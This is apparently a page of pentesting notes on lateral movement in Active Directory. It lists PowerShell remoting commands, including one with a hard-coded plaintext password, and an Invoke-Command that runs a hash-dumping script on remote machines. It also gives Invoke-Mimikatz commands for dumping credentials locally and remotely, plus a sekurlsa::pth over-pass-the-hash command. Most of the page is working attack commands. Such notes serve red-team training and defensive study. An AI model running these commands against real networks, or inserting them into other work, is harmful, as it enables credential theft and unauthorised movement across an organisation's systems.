Lateral Movement in AD

Enable PS Remoting by Enable-PSRemoting and add a firewall exception

Types

one to one -> Runs in a new process (wsmprovhost) its state full
One to many

One-To-One

New-PSSession

$sess = New-PSSession -ComputerName

$sess = New-PSSession -ComputerName -Credentials 

Enter-PSSession -Session $sess

Enter-PSSession
Enter-PSSession -ComputerName

$password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("test", $password)
Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred

One-To-Many

//One Computer
Invoke-Command -ComputerName {} -ScriptBlock{whoami;hostname}

localfunction to remote computer
Invoke-Command -ComputerName {} -ScriptBlock ${function: }

//Multiple Computer
Invoke-Command -ComputerName (Get-content <txt file> ) -ScriptBlock{whoami;hostname}

//Important
Invoke-Command -ComputerName  -FilePath C:\script\Get-PassHashes.ps1

Using Mimikatz

Invoke-Mimikatz

//local machine
Invoke-Mimikatz -DumpCreds

//Remote Machine
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1,"sys2")

Over Pass The Hash

//Over Pass the Hash attack

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:<domain> /ntlm:<hash> /run:powershell.exe"'

PreviousDC Sync NextWMI and WinRM

Last updated 1 year ago